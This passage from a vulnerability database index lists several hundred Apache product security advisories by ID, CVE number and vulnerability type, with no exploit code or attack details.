10973| [101620] Apache Subversion 'libsvn_fs_fs/fs_fs.c' Denial of Service Vulnerability
10974| [101585] Apache OpenOffice Multiple Remote Code Execution Vulnerabilities
10975| [101577] Apache Wicket CVE-2016-6806 Cross Site Request Forgery Vulnerability
10976| [101575] Apache Wicket CVE-2014-0043 Information Disclosure Vulnerability
10977| [101570] Apache Geode CVE-2017-9797 Information Disclosure Vulnerability
10978| [101562] Apache Derby CVE-2010-2232 Arbitrary File Overwrite Vulnerability
10979| [101560] Apache Portable Runtime Utility CVE-2017-12613 Multiple Information Disclosure Vulnerabilities
10980| [101558] Apache Portable Runtime Utility Local Out-of-Bounds Read Denial of Service Vulnerability
10981| [101532] Apache James CVE-2017-12628 Arbitrary Command Execution Vulnerability
10982| [101516] Apache HTTP Server CVE-2017-12171 Security Bypass Vulnerability
10983| [101261] Apache Solr/Lucene CVE-2017-12629 Information Disclosure and Remote Code Execution Vulnerabilities
10984| [101230] Apache Roller CVE-2014-0030 XML External Entity Injection Vulnerability
10985| [101173] Apache IMPALA CVE-2017-9792 Information Disclosure Vulnerability
10986| [101052] Apache Commons Jelly CVE-2017-12621 Security Bypass Vulnerability
10987| [101027] Apache Mesos CVE-2017-7687 Denial of Service Vulnerability
10988| [101023] Apache Mesos CVE-2017-9790 Denial of Service Vulnerability
10989| [100954] Apache Tomcat CVE-2017-12617 Incomplete Fix Remote Code Execution Vulnerability
10990| [100946] Apache Wicket CVE-2014-7808 Cross Site Request Forgery Vulnerability
10991| [100901] Apache Tomcat CVE-2017-12615 Remote Code Execution Vulnerability
10992| [100897] Apache Tomcat CVE-2017-12616 Information Disclosure Vulnerability
10993| [100880] Apache Directory LDAP API CVE-2015-3250 Unspecified Information Disclosure Vulnerability
10994| [100872] Apache HTTP Server CVE-2017-9798 Information Disclosure Vulnerability
10995| [100870] Apache Solr CVE-2017-9803 Remote Privilege Escalation Vulnerability
10996| [100859] puppetlabs-apache CVE-2017-2299 Information Disclosure Vulnerability
10997| [100829] Apache Struts CVE-2017-12611 Remote Code Execution Vulnerability
10998| [100823] Apache Spark CVE-2017-12612 Deserialization Remote Code Execution Vulnerability
10999| [100612] Apache Struts CVE-2017-9804 Incomplete Fix Denial of Service Vulnerability
11000| [100611] Apache Struts CVE-2017-9793 Denial of Service Vulnerability
11001| [100609] Apache Struts CVE-2017-9805 Remote Code Execution Vulnerability
11002| [100587] Apache Atlas CVE-2017-3155 Cross Frame Scripting Vulnerability
11003| [100581] Apache Atlas CVE-2017-3154 Information Disclosure Vulnerability
11004| [100578] Apache Atlas CVE-2017-3153 Cross Site Scripting Vulnerability
11005| [100577] Apache Atlas CVE-2017-3152 Cross Site Scripting Vulnerability
11006| [100547] Apache Atlas CVE-2017-3151 HTML Injection Vulnerability
11007| [100536] Apache Atlas CVE-2017-3150 Cross Site Scripting Vulnerability
11008| [100449] Apache Pony Mail CVE-2016-4460 Authentication Bypass Vulnerability
11009| [100447] Apache2Triad Multiple Security Vulnerabilities
11010| [100284] Apache Sling Servlets Post CVE-2017-9802 Cross Site Scripting Vulnerability
11011| [100280] Apache Tomcat CVE-2017-7674 Security Bypass Vulnerability
11012| [100259] Apache Subversion CVE-2017-9800 Remote Command Execution Vulnerability
11013| [100256] Apache Tomcat CVE-2017-7675 Directory Traversal Vulnerability
11014| [100235] Apache Storm CVE-2017-9799 Remote Code Execution Vulnerability
11015| [100082] Apache Commons Email CVE-2017-9801 SMTP Header Injection Vulnerability
11016| [99873] Apache Sling XSS Protection API CVE-2016-6798 XML External Entity Injection Vulnerability
11017| [99870] Apache Sling API CVE-2016-5394 Cross Site Scripting Vulnerability
11018| [99603] Apache Spark CVE-2017-7678 Cross Site Scripting Vulnerability
11019| [99592] Apache OpenMeetings CVE-2017-7685 Security Bypass Vulnerability
11020| [99587] Apache OpenMeetings CVE-2017-7673 Security Bypass Vulnerability
11021| [99586] Apache OpenMeetings CVE-2017-7688 Security Bypass Vulnerability
11022| [99584] Apache OpenMeetings CVE-2017-7684 Denial of Service Vulnerability
11023| [99577] Apache OpenMeetings CVE-2017-7663 Cross Site Scripting Vulnerability
11024| [99576] Apache OpenMeetings CVE-2017-7664 XML External Entity Injection Vulnerability
11025| [99569] Apache HTTP Server CVE-2017-9788 Memory Corruption Vulnerability
11026| [99568] Apache HTTP Server CVE-2017-9789 Denial of Service Vulnerability
11027| [99563] Apache Struts CVE-2017-7672 Denial of Service Vulnerability
11028| [99562] Apache Struts Spring AOP Functionality Denial of Service Vulnerability
11029| [99509] Apache Impala CVE-2017-5652 Information Disclosure Vulnerability
11030| [99508] Apache IMPALA CVE-2017-5640 Authentication Bypass Vulnerability
11031| [99486] Apache Traffic Control CVE-2017-7670 Denial of Service Vulnerability
11032| [99485] Apache Solr CVE-2017-7660 Security Bypass Vulnerability
11033| [99484] Apache Struts CVE-2017-9791 Remote Code Execution Vulnerability
11034| [99292] Apache Ignite CVE-2017-7686 Information Disclosure Vulnerability
11035| [99170] Apache HTTP Server CVE-2017-7679 Buffer Overflow Vulnerability
11036| [99137] Apache HTTP Server CVE-2017-7668 Denial of Service Vulnerability
11037| [99135] Apache HTTP Server CVE-2017-3167 Authentication Bypass Vulnerability
11038| [99134] Apache HTTP Server CVE-2017-3169 Denial of Service Vulnerability
11039| [99132] Apache HTTP Server CVE-2017-7659 Denial of Service Vulnerability
11040| [99112] Apache Thrift CVE-2015-3254 Denial of Service Vulnerability
11041| [99067] Apache Ranger CVE-2016-8751 HTML Injection Vulnerability
11042| [99018] Apache NiFi CVE-2017-7667 Cross Frame Scripting Vulnerability
11043| [99009] Apache NiFi CVE-2017-7665 Cross Site Scripting Vulnerability
11044| [98961] Apache Ranger CVE-2017-7677 Security Bypass Vulnerability
11045| [98958] Apache Ranger CVE-2017-7676 Security Bypass Vulnerability
11046| [98888] Apache Tomcat CVE-2017-5664 Security Bypass Vulnerability
11047| [98814] Apache Zookeeper CVE-2017-5637 Denial of Service Vulnerability
11048| [98795] Apache Hadoop CVE-2017-7669 Remote Privilege Escalation Vulnerability
11049| [98739] Apache Knox CVE-2017-5646 User Impersonation Vulnerability
11050| [98669] Apache Hive CVE-2016-3083 Security Bypass Vulnerability
11051| [98646] Apache Atlas CVE-2016-8752 Information Disclosure Vulnerability
11052| [98570] Apache Archiva CVE-2017-5657 Multiple Cross-Site Request Forgery Vulnerabilities
11053| [98489] Apache CXF Fediz CVE-2017-7661 Multiple Cross Site Request Forgery Vulnerabilities
11054| [98485] Apache CXF Fediz CVE-2017-7662 Cross Site Request Forgery Vulnerability
11055| [98466] Apache Ambari CVE-2017-5655 Insecure Temporary File Handling Vulnerability
11056| [98365] Apache Cordova For Android CVE-2016-6799 Information Disclosure Vulnerability
11057| [98025] Apache Hadoop CVE-2017-3161 Cross Site Scripting Vulnerability
11058| [98017] Apache Hadoop CVE-2017-3162 Input Validation Vulnerability
11059| [97971] Apache CXF CVE-2017-5656 Information Disclosure Vulnerability
11060| [97968] Apache CXF CVE-2017-5653 Spoofing Vulnerability
11061| [97967] Apache ActiveMQ CVE-2015-7559 Denial of Service Vulnerability
11062| [97949] Apache Traffic Server CVE-2017-5659 Denial of Service Vulnerability
11063| [97948] Apache Batik CVE-2017-5662 XML External Entity Information Disclosure Vulnerability
11064| [97947] Apache FOP CVE-2017-5661 XML External Entity Information Disclosure Vulnerability
11065| [97945] Apache Traffic Server CVE-2016-5396 Denial of Service Vulnerability
11066| [97702] Apache Log4j CVE-2017-5645 Remote Code Execution Vulnerability
11067| [97582] Apache CXF CVE-2016-6812 Cross Site Scripting Vulnerability
11068| [97579] Apache CXF JAX-RS CVE-2016-8739 XML External Entity Injection Vulnerability
11069| [97544] Apache Tomcat CVE-2017-5651 Information Disclosure Vulnerability
11070| [97531] Apache Tomcat CVE-2017-5650 Denial of Service Vulnerability
11071| [97530] Apache Tomcat CVE-2017-5648 Information Disclosure Vulnerability
11072| [97509] Apache Ignite CVE-2016-6805 Information Disclosure and XML External Entity Injection Vulnerabilities
11073| [97383] Apache Flex BlazeDS CVE-2017-5641 Remote Code Execution Vulnerability
11074| [97378] Apache Geode CVE-2017-5649 Information Disclosure Vulnerability
11075| [97229] Apache Ambari CVE-2016-4976 Local Information Disclosure Vulnerability
11076| [97226] Apache Camel CVE-2017-5643 Server Side Request Forgery Security Bypass Vulnerability
11077| [97184] Apache Ambari CVE-2016-6807 Remote Command Execution Vulnerability
11078| [97179] Apache Camel CVE-2016-8749 Java Deserialization Multiple Remote Code Execution Vulnerabilities
11079| [96983] Apache POI CVE-2017-5644 Denial Of Service Vulnerability
11080| [96895] Apache Tomcat CVE-2016-8747 Information Disclosure Vulnerability
11081| [96731] Apache NiFi CVE-2017-5636 Remote Code Injection Vulnerability
11082| [96730] Apache NiFi CVE-2017-5635 Security Bypass Vulnerability
11083| [96729] Apache Struts CVE-2017-5638 Remote Code Execution Vulnerability
11084| [96540] IBM Development Package for Apache Spark CVE-2016-4970 Denial of Service Vulnerability
11085| [96398] Apache CXF CVE-2017-3156 Information Disclosure Vulnerability
11086| [96321] Apache Camel CVE-2017-3159 Remote Code Execution Vulnerability
11087| [96293] Apache Tomcat 'http11/AbstractInputBuffer.java' Denial of Service Vulnerability
11088| [96228] Apache Brooklyn Cross Site Request Forgery and Multiple Cross Site Scripting Vulnerabilities
11089| [95998] Apache Ranger CVE-2016-8746 Security Bypass Vulnerability
11090| [95929] Apache Groovy CVE-2016-6497 Information Disclosure Vulnerability
11091| [95838] Apache Cordova For Android CVE-2017-3160 Man in the Middle Security Bypass Vulnerability
11092| [95675] Apache Struts Remote Code Execution Vulnerability
11093| [95621] Apache NiFi CVE-2106-8748 Cross Site Scripting Vulnerability
11094| [95429] Apache Groovy CVE-2016-6814 Remote Code Execution Vulnerability
11095| [95335] Apache Hadoop CVE-2016-3086 Information Disclosure Vulnerability
11096| [95168] Apache Wicket CVE-2016-6793 Denial of Service Vulnerability
11097| [95136] Apache Qpid Broker for Java CVE-2016-8741 Remote Information Disclosure Vulnerability
11098| [95078] Apache HTTP Server CVE-2016-0736 Remote Security Vulnerability
11099| [95077] Apache HTTP Server CVE-2016-8743 Security Bypass Vulnerability
11100| [95076] Apache HTTP Server CVE-2016-2161 Denial of Service Vulnerability
11101| [95020] Apache Tika CVE-2015-3271 Remote Information Disclosure Vulnerability
11102| [94950] Apache Hadoop CVE-2016-5001 Local Information Disclosure Vulnerability
11103| [94882] Apache ActiveMQ CVE-2016-6810 HTML Injection Vulnerability
11104| [94828] Apache Tomcat CVE-2016-8745 Information Disclosure Vulnerability
11105| [94766] Apache CouchDB CVE-2016-8742 Local Privilege Escalation Vulnerability
11106| [94657] Apache Struts CVE-2016-8738 Denial of Service Vulnerability
11107| [94650] Apache HTTP Server CVE-2016-8740 Denial of Service Vulnerability
11108| [94588] Apache Subversion CVE-2016-8734 XML External Entity Denial of Service Vulnerability
11109| [94513] Apache Karaf CVE-2016-8648 Remote Code Execution Vulnerability
11110| [94463] Apache Tomcat CVE-2016-8735 Remote Code Execution Vulnerability
11111| [94462] Apache Tomcat CVE-2016-6817 Denial of Service Vulnerability
11112| [94461] Apache Tomcat CVE-2016-6816 Security Bypass Vulnerability
11113| [94418] Apache OpenOffice CVE-2016-6803 Local Privilege Escalation Vulnerability
11114| [94247] Apache Tika CVE-2016-6809 Remote Code Execution Vulnerability
11115| [94221] Apache Ranger CVE-2016-6815 Local Privilege Escalation Vulnerability
11116| [94145] Apache OpenMeetings CVE-2016-8736 Remote Code Execution Vulnerability
11117| [93945] Apache CloudStack CVE-2016-6813 Authorization Bypass Vulnerability
11118| [93944] Apache Tomcat Security Manager CVE-2016-6796 Security Bypass Vulnerability
11119| [93943] Apache Tomcat CVE-2016-6794 Security Bypass Vulnerability
11120| [93942] Apache Tomcat Security Manager CVE-2016-5018 Security Bypass Vulnerability
11121| [93940] Apache Tomcat CVE-2016-6797 Security Bypass Vulnerability
11122| [93939] Apache Tomcat CVE-2016-0762 Information Disclosure Vulnerability
11123| [93774] Apache OpenOffice CVE-2016-6804 DLL Loading Remote Code Execution Vulnerability
11124| [93773] Apache Struts CVE-2016-6795 Directory Traversal Vulnerability
11125| [93478] Apache Tomcat CVE-2016-6325 Local Privilege Escalation Vulnerability
11126| [93472] Apache Tomcat CVE-2016-5425 Insecure File Permissions Vulnerability
11127| [93429] Apache Tomcat JK Connector CVE-2016-6808 Remote Buffer Overflow Vulnerability
11128| [93263] Apache Tomcat CVE-2016-1240 Local Privilege Escalation Vulnerability
11129| [93236] Apache MyFaces Trinidad CVE-2016-5019 Remote Code Execution Vulnerability
11130| [93142] Apache ActiveMQ Artemis CVE-2016-4978 Remote Code Execution Vulnerability
11131| [93132] Apache Derby CVE-2015-1832 XML External Entity Information Disclosure Vulnerability
11132| [93044] Apache Zookeeper CVE-2016-5017 Buffer Overflow Vulnerability
11133| [92966] Apache Jackrabbit CVE-2016-6801 Cross-Site Request Forgery Vulnerability
11134| [92947] Apache Shiro CVE-2016-6802 Remote Security Bypass Vulnerability
11135| [92905] Apache CXF Fediz CVE-2016-4464 Security Bypass Vulnerability
11136| [92577] Apache Ranger CVE-2016-5395 HTML Injection Vulnerability
11137| [92331] Apache HTTP Server CVE-2016-1546 Remote Denial of Service Vulnerability
11138| [92328] Apache Hive CVE-2016-0760 Multiple Remote Code Execution Vulnerabilities
11139| [92320] Apache APR-util and httpd CVE-2016-6312 Denial of Service Vulnerability
11140| [92100] Apache POI CVE-2016-5000 XML External Entity Injection Vulnerability
11141| [92079] Apache OpenOffice CVE-2016-1513 Remote Code Execution Vulnerability
11142| [91818] Apache Tomcat CVE-2016-5388 Security Bypass Vulnerability
11143| [91816] Apache HTTP Server CVE-2016-5387 Security Bypass Vulnerability
11144| [91788] Apache Qpid Proton CVE-2016-4467 Certificate Verification Security Bypass Vulnerability
11145| [91738] Apache XML-RPC CVE-2016-5003 Remote Code Execution Vulnerability
11146| [91736] Apache XML-RPC Multiple Security Vulnerabilities
11147| [91707] Apache Archiva CVE-2016-5005 HTML Injection Vulnerability
11148| [91703] Apache Archiva CVE-2016-4469 Multiple Cross-Site Request Forgery Vulnerabilities
11149| [91566] Apache HTTP Server CVE-2016-4979 Authentication Bypass Vulnerability
11150| [91537] Apache QPID CVE-2016-4974 Deserialization Security Bypass Vulnerability
11151| [91501] Apache Xerces-C CVE-2016-4463 Stack Buffer Overflow Vulnerability
11152| [91453] Apache Commons FileUpload CVE-2016-3092 Denial Of Service Vulnerability
11153| [91284] Apache Struts CVE-2016-4431 Security Bypass Vulnerability
11154| [91282] Apache Struts CVE-2016-4433 Security Bypass Vulnerability
11155| [91281] Apache Struts CVE-2016-4430 Cross-Site Request Forgery Vulnerability
11156| [91280] Apache Struts CVE-2016-4436 Security Bypass Vulnerability
11157| [91278] Apache Struts CVE-2016-4465 Denial of Service Vulnerability
11158| [91277] Apache Struts Incomplete Fix Remote Code Execution Vulnerability
11159| [91275] Apache Struts CVE-2016-4438 Remote Code Execution Vulnerability
11160| [91217] Apache Continuum 'saveInstallation.action' Command Execution Vulnerability
11161| [91141] Apache CloudStack CVE-2016-3085 Authentication Bypass Vulnerability
11162| [91068] Apache Struts CVE-2016-1181 Remote Code Execution Vulnerability
11163| [91067] Apache Struts CVE-2016-1182 Security Bypass Vulnerability
11164| [91024] Apache Shiro CVE-2016-4437 Information Disclosure Vulnerability
11165| [90988] Apache Ranger CVE-2016-2174 SQL Injection Vulnerability
11166| [90961] Apache Struts CVE-2016-3093 Denial of Service Vulnerability
11167| [90960] Apache Struts CVE-2016-3087 Remote Code Execution Vulnerability
11168| [90921] Apache Qpid CVE-2016-4432 Authentication Bypass Vulnerability
11169| [90920] Apache Qpid CVE-2016-3094 Denial of Service Vulnerability
11170| [90902] Apache PDFBox CVE-2016-2175 XML External Entity Injection Vulnerability
11171| [90897] Apache Tika CVE-2016-4434 XML External Entity Injection Vulnerability
11172| [90827] Apache ActiveMQ CVE-2016-3088 Multiple Arbitrary File Upload Vulnerabilities
11173| [90755] Apache Ambari CVE-2016-0707 Multiple Local Information Disclosure Vulnerabilities
11174| [90482] Apache CVE-2004-1387 Local Security Vulnerability
11175| [89762] Apache CVE-2001-1556 Remote Security Vulnerability
11176| [89417] Apache Subversion CVE-2016-2167 Authentication Bypass Vulnerability
11177| [89326] RETIRED: Apache Subversion CVE-2016-2167 Security Bypass Vulnerability
11178| [89320] Apache Subversion CVE-2016-2168 Remote Denial of Service Vulnerability
11179| [88826] Apache Struts CVE-2016-3082 Remote Code Execution Vulnerability
11180| [88797] Apache Cordova For iOS CVE-2015-5208 Arbitrary Code Execution Vulnerability
11181| [88764] Apache Cordova iOS CVE-2015-5207 Multiple Security Bypass Vulnerabilities
11182| [88701] Apache CVE-2001-1449 Remote Security Vulnerability
11183| [88635] Apache CVE-2000-1204 Remote Security Vulnerability
11184| [88590] Apache WWW server CVE-1999-1199 Denial-Of-Service Vulnerability
11185| [88496] Apache CVE-2000-1206 Remote Security Vulnerability
11186| [87828] Apache CVE-1999-1237 Remote Security Vulnerability
11187| [87784] Apache CVE-1999-1293 Denial-Of-Service Vulnerability
11188| [87327] Apache Struts CVE-2016-3081 Remote Code Execution Vulnerability
11189| [86622] Apache Stats CVE-2007-0975 Remote Security Vulnerability
11190| [86399] Apache CVE-2007-1743 Local Security Vulnerability
11191| [86397] Apache CVE-2007-1742 Local Security Vulnerability
11192| [86311] Apache Struts CVE-2016-4003 Cross Site Scripting Vulnerability
11193| [86174] Apache Wicket CVE-2015-5347 Cross Site Scripting Vulnerability
11194| [85971] Apache OFBiz CVE-2016-2170 Java Deserialization Remote Code Execution Vulnerability
11195| [85967] Apache OFBiz CVE-2015-3268 HTML Injection Vulnerability
11196| [85759] Apache Jetspeed CVE-2016-2171 Unauthorized Access Vulnerability
11197| [85758] Apache Jetspeed CVE-2016-0712 Cross Site Scripting Vulnerability
11198| [85756] Apache Jetspeed CVE-2016-0710 Multiple SQL Injection Vulnerabilities
11199| [85755] Apache Jetspeed CVE-2016-0711 Mulitple HTML Injection Vulnerabilities
11200| [85754] Apache Jetspeed CVE-2016-0709 Directory Traversal Vulnerability
11201| [85730] Apache Subversion CVE-2015-5343 Integer Overflow Vulnerability
11202| [85691] Apache Ranger CVE-2016-0735 Security Bypass Vulnerability
11203| [85578] Apache ActiveMQ CVE-2010-1244 Cross-Site Request Forgery Vulnerability
11204| [85554] Apache OpenMeetings CVE-2016-2164 Multiple Information Disclosure Vulnerabilities
11205| [85553] Apache OpenMeetings CVE-2016-0783 Information Disclosure Vulnerability
11206| [85552] Apache OpenMeetings CVE-2016-2163 HTML Injection Vulnerability
11207| [85550] Apache OpenMeetings CVE-2016-0784 Directory Traversal Vulnerability
11208| [85386] Apache Hadoop CVE-2015-7430 Local Privilege Escalation Vulnerability
11209| [85377] Apache Qpid Proton Python API CVE-2016-2166 Man in the Middle Security Bypass Vulnerability
11210| [85205] Apache Solr CVE-2015-8796 Cross Site Scripting Vulnerability
11211| [85203] Apache Solr CVE-2015-8795 Mulitple HTML Injection Vulnerabilities
11212| [85163] Apache Geronimo CVE-2008-0732 Local Security Vulnerability
11213| [85131] Apache Struts 'TextParseUtil.translateVariables()' Method Remote Code Execution Vulnerability
11214| [85070] Apache Struts CVE-2016-2162 Cross Site Scripting Vulnerability
11215| [85066] Apache Struts CVE-2016-0785 Remote Code Execution Vulnerability
11216| [84422] Apache TomEE CVE-2016-0779 Unspecified Security Vulnerability
11217| [84321] Apache ActiveMQ CVE-2016-0734 Clickjacking Vulnerability
11218| [84316] Apache ActiveMQ CVE-2016-0782 Multiple Cross Site Scripting Vulnerabilities
11219| [83910] Apache Wicket CVE-2015-7520 Cross Site Scripting Vulnerability
11220| [83423] Apache Xerces-C CVE-2016-0729 Buffer Overflow Vulnerability
11221| [83330] Apache Tomcat CVE-2015-5351 Cross Site Request Forgery Vulnerability
11222| [83329] Apache Tomcat CVE-2015-5174 Directory Traversal Vulnerability
11223| [83328] Apache Tomcat CVE-2015-5345 Directory Traversal Vulnerability
11224| [83327] Apache Tomcat Security Manager CVE-2016-0714 Remote Code Execution Vulnerability
11225| [83326] Apache Tomcat CVE-2016-0763 Security Bypass Vulnerability
11226| [83324] Apache Tomcat Security Manager CVE-2016-0706 Information Disclosure Vulnerability
11227| [83323] Apache Tomcat CVE-2015-5346 Session Fixation Vulnerability
11228| [83259] Apache Hadoop CVE-2015-1776 Information Disclosure Vulnerability
11229| [83243] Apache Solr CVE-2015-8797 Cross Site Scripting Vulnerability
11230| [83119] Apache Sling CVE-2016-0956 Information Disclosure Vulnerability
11231| [83002] Apache CVE-2000-1205 Cross-Site Scripting Vulnerability
11232| [82871] Apache Ranger Authentication Bypass and Security Bypass Vulnerabilities
11233| [82800] Apache CloudStack CVE-2015-3251 Information Disclosure Vulnerability
11234| [82798] Apache CloudStack CVE-2015-3252 Authentication Bypass Vulnerability
11235| [82732] Apache Gallery CVE-2003-0771 Local Security Vulnerability
11236| [82676] Apache CVE-2003-1581 Cross-Site Scripting Vulnerability
11237| [82550] Apache Struts CVE-2015-5209 Security Bypass Vulnerability
11238| [82300] Apache Subversion CVE-2015-5259 Integer Overflow Vulnerability
11239| [82260] Apache Camel CVE-2015-5344 Remote Code Execution Vulnerability
11240| [82234] Apache Hive CVE-2015-7521 Security Bypass Vulnerability
11241| [82082] Apache CVE-1999-0289 Remote Security Vulnerability
11242| [81821] Apache Distribution for Solaris CVE-2007-2080 SQL-Injection Vulnerability
11243| [80696] Apache Camel CVE-2015-5348 Information Disclosure Vulnerability
11244| [80525] Apache CVE-2003-1580 Remote Security Vulnerability
11245| [80354] Drupal Apache Solr Search Module Access Bypass Vulnerability
11246| [80193] Apache CVE-1999-0107 Denial-Of-Service Vulnerability
11247| [79812] Apache Directory Studio CVE-2015-5349 Command Injection Vulnerability
11248| [79744] Apache HBase CVE-2015-1836 Unauthorized Access Vulnerability
11249| [79204] Apache TomEE 'EjbObjectInputStream' Remote Code Execution Vulnerability
11250| [77679] Apache Cordova For Android CVE-2015-8320 Weak Randomization Security Bypass Vulnerability
11251| [77677] Apache Cordova For Android CVE-2015-5256 Security Bypass Vulnerability
11252| [77591] Apache CXF SAML SSO Processing CVE-2015-5253 Security Bypass Vulnerability
11253| [77521] Apache Commons Collections 'InvokerTransformer.java' Remote Code Execution Vulnerability
11254| [77110] Apache HttpComponents HttpClient CVE-2015-5262 Denial of Service Vulnerability
11255| [77086] Apache Ambari CVE-2015-1775 Server Side Request Forgery Security Bypass Vulnerability
11256| [77085] Apache Ambari CVE-2015-3270 Remote Privilege Escalation Vulnerability
11257| [77082] Apache Ambari 'targetURI' Parameter Open Redirection Vulnerability
11258| [77059] Apache Ambari CVE-2015-3186 Cross Site Scripting Vulnerability
11259| [76933] Apache James Server Unspecified Command Execution Vulnerability
11260| [76832] Apache cordova-plugin-file-transfer CVE-2015-5204 HTTP Header Injection Vulnerability
11261| [76625] Apache Struts CVE-2015-5169 Cross Site Scripting Vulnerability
11262| [76624] Apache Struts CVE-2015-2992 Cross Site Scripting Vulnerability
11263| [76522] Apache Tapestry CVE-2014-1972 Security Bypass Vulnerability
11264| [76486] Apache CXF Fediz CVE-2015-5175 Denial of Service Vulnerability
11265| [76452] Apache ActiveMQ CVE-2015-1830 Directory Traversal Vulnerability
11266| [76446] Apache Subversion 'libsvn_fs_fs/tree.c' Denial of Service Vulnerability
11267| [76274] Apache Subversion CVE-2015-3184 Information Disclosure Vulnerability
11268| [76273] Apache Subversion CVE-2015-3187 Information Disclosure Vulnerability
11269| [76272] Apache ActiveMQ CVE-2014-3576 Denial of Service Vulnerability
11270| [76221] Apache Ranger CVE-2015-0266 Access Bypass Vulnerability
11271| [76208] Apache Ranger CVE-2015-0265 JavaScript Code Injection Vulnerability
11272| [76025] Apache ActiveMQ Artemis CVE-2015-3208 XML External Entity Information Disclosure Vulnerability
11273| [75965] Apache HTTP Server CVE-2015-3185 Security Bypass Vulnerability
11274| [75964] Apache HTTP Server CVE-2015-0253 Remote Denial of Service Vulnerability
11275| [75963] Apache HTTP Server CVE-2015-3183 Security Vulnerability
11276| [75940] Apache Struts CVE-2015-1831 Security Bypass Vulnerability
11277| [75919] Apache Groovy CVE-2015-3253 Remote Code Execution Vulnerability
11278| [75338] Apache Storm CVE-2015-3188 Remote Code Execution Vulnerability
11279| [75275] Drupal Apache Solr Real-Time Module Access Bypass Vulnerability
11280| [74866] Apache Cordova For Android CVE-2015-1835 Security Bypass Vulnerability
11281| [74839] Apache Sling API and Sling Servlets CVE-2015-2944 Cross Site Scripting Vulnerability
11282| [74761] Apache Jackrabbit CVE-2015-1833 XML External Entity Information Disclosure Vulnerability
11283| [74686] Apache Ambari '/var/lib/ambari-server/ambari-env.sh' Local Privilege Escalation Vulnerability
11284| [74665] Apache Tomcat CVE-2014-7810 Security Bypass Vulnerability
11285| [74475] Apache Tomcat CVE-2014-0230 Denial of Service Vulnerability
11286| [74423] Apache Struts CVE-2015-0899 Security Bypass Vulnerability
11287| [74338] Apache OpenOffice HWP Filter Memory Corruption Vulnerability
11288| [74265] Apache Tomcat 'mod_jk' CVE-2014-8111 Information Disclosure Vulnerability
11289| [74260] Apache Subversion CVE-2015-0248 Multiple Denial of Service Vulnerabilities
11290| [74259] Apache Subversion 'deadprops.c' Security Bypass Vulnerability
11291| [74204] PHP 'sapi/apache2handler/sapi_apache2.c' Remote Code Execution Vulnerability
11292| [74158] Apache HTTP Server 'protocol.c' Remote Denial of Service Vulnerability
11293| [73954] Apache Flex 'asdoc/templates/index.html' Cross Site Scripting Vulnerability
11294| [73851] Apache2 CVE-2012-0216 Cross-Site Scripting Vulnerability
11295| [73478] Apache Cassandra CVE-2015-0225 Remote Code Execution Vulnerability
11296| [73041] Apache HTTP Server 'mod_lua' Module Denial of Service Vulnerability
11297| [73040] Apache HTTP Server 'mod_lua.c' Local Access Bypass Vulnerability
11298| [72809] Apache Standard Taglibs CVE-2015-0254 XML External Entity Injection Vulnerability
11299| [72717] Apache Tomcat CVE-2014-0227 Chunk Request Remote Denial Of Service Vulnerability
11300| [72557] Apache WSS4J CVE-2015-0227 Security Bypass Vulnerability
11301| [72553] Apache WSS4J CVE-2015-0226 Information Disclosure Vulnerability
11302| [72513] Apache ActiveMQ CVE-2014-3612 LDAP Authentication Bypass Vulnerability
11303| [72511] Apache ActiveMQ CVE-2014-8110 Multiple Cross Site Scripting Vulnerabilities
11304| [72510] Apache ActiveMQ CVE-2014-3600 XML External Entity Injection Vulnerability
11305| [72508] Apache ActiveMQ Apollo CVE-2014-3579 XML External Entity Injection Vulnerability
11306| [72319] Apache Qpid CVE-2015-0223 Security Bypass Vulnerability
11307| [72317] Apache Qpid CVE-2015-0224 Incomplete Fix Multiple Denial of Service Vulnerabilities
11308| [72115] Apache Santuario 'XML Signature Verification' Security Bypass Vulnerability
11309| [72053] Apache HTTP Server 'mod_remoteip.c' IP Address Spoofing Vulnerability
11310| [72030] Apache Qpid CVE-2015-0203 Multiple Denial of Service Vulnerabilities
11311| [71879] Apache Traffic Server 'HttpTransact.cc' Denial of Service Vulnerability
11312| [71726] Apache Subversion CVE-2014-3580 Remote Denial of Service Vulnerability
11313| [71725] Apache Subversion CVE-2014-8108 Remote Denial of Service Vulnerability
11314| [71657] Apache HTTP Server 'mod_proxy_fcgi' Module Denial of Service Vulnerability
11315| [71656] Apache HTTP Server 'mod_cache' Module Denial of Service Vulnerability
11316| [71548] Apache Struts CVE-2014-7809 Security Bypass Vulnerability
11317| [71466] Apache Hadoop CVE-2014-3627 Information Disclosure Vulnerability
11318| [71353] Apache HTTP Server 'LuaAuthzProvider' Authorization Bypass Vulnerability
11319| [71004] Apache Qpid CVE-2014-3629 XML External Entity Injection Vulnerability
11320| [70970] Apache Traffic Server Cross Site Scripting Vulnerability
11321| [70738] Apache CXF CVE-2014-3584 Denial of Service Vulnerability
11322| [70736] Apache CXF SAML SubjectConfirmation Security Bypass Vulnerability
11323| [69728] Apache Tomcat CVE-2013-4444 Arbitrary File Upload Vulnerability
11324| [69648] Apache POI CVE-2014-3574 Denial Of Service Vulnerability
11325| [69647] Apache POI OpenXML parser CVE-2014-3529 XML External Entity Information Disclosure Vulnerability
11326| [69351] Apache OpenOffice Calc CVE-2014-3524 Command Injection Vulnerability
11327| [69295] Apache Axis Incomplete Fix CVE-2014-3596 SSL Certificate Validation Security Bypass Vulnerability
11328| [69286] Apache OFBiz CVE-2014-0232 Multiple Cross Site Scripting Vulnerabilities
11329| [69258] Apache HttpComponents Incomplete Fix CVE-2014-3577 SSL Validation Security Bypass Vulnerability
11330| [69257] Apache HttpComponents Incomplete Fix SSL Certificate Validation Security Bypass Vulnerability
11331| [69248] Apache HTTP Server CVE-2013-4352 Remote Denial of Service Vulnerability
11332| [69237] Apache Subversion CVE-2014-3522 SSL Certificate Validation Information Disclosure Vulnerability
11333| [69173] Apache Traffic Server CVE-2014-3525 Unspecified Security Vulnerability
11334| [69046] Apache Cordova For Android CVE-2014-3502 Information Disclosure Vulnerability
11335| [69041] Apache Cordova For Android CVE-2014-3501 Security Bypass Vulnerability
11336| [69038] Apache Cordova For Android CVE-2014-3500 Security Bypass Vulnerability
11337| [68995] Apache Subversion CVE-2014-3528 Insecure Authentication Weakness
11338| [68966] Apache Subversion 'irkerbridge.py' Local Privilege Escalation Vulnerability
11339| [68965] Apache Subversion 'svnwcsub.py' Local Privilege Escalation Vulnerability
11340| [68863] Apache HTTP Server 'mod_cache' Module Remote Denial of Service Vulnerability
11341| [68747] Apache HTTP Server CVE-2014-3523 Remote Denial of Service Vulnerability
11342| [68745] Apache HTTP Server CVE-2014-0118 Remote Denial of Service Vulnerability
11343| [68742] Apache HTTP Server CVE-2014-0231 Remote Denial of Service Vulnerability
